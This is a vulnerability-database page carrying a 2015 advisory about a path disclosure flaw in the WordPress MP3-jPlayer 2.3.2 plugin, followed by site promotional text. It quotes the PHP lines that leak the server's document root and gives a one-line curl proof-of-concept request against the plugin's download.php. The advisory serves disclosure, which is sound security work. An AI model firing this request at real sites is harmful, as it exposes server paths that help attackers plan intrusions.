Vulners
Lucene search
WordPress MP3-jPlayer 2.3.2 Path Disclosure Vulnerability
Title: Path Disclosure Vulnerability in wordpress plugin MP3-jPlayer v2.3.2
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-12
Download Site: https://wordpress.org/plugins/mp3-jplayer/
Vendor: https://profiles.wordpress.org/simonward-1/
Vendor Notified: 2015-08-06
Vendor Contact:
Description: Easy, Flexible Audio for WordPress.
Vulnerability:
The download code allows arbitrary users to disclose path information on wordpress sites with this plugin installed.
120 $info = "<p>
121 Get: " . $mp3 . "<br />
122 Sent: " . $sent . "<br />
123 File: " . $file . "<br />
124 Open: " . $_SERVER['DOCUMENT_ROOT'] . $fp . "<br />
125 Root: " . $rooturl . "<br />
126 pID: " . $playerID . "<br />
127 Dbug: " . $dbug . "<br />
128 extension: " . $fileExtension . "</p>";
129 echo $info;
CVEID:
OSVDB:
Exploit Code:
• $ curl http://www.example.com/wp-content/plugins/mp3-jplayer/download.php?mp3=.
# 0day.today [2018-02-15] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Aug 2015 00:00Current
6.9Medium risk
Vulners AI Score6.9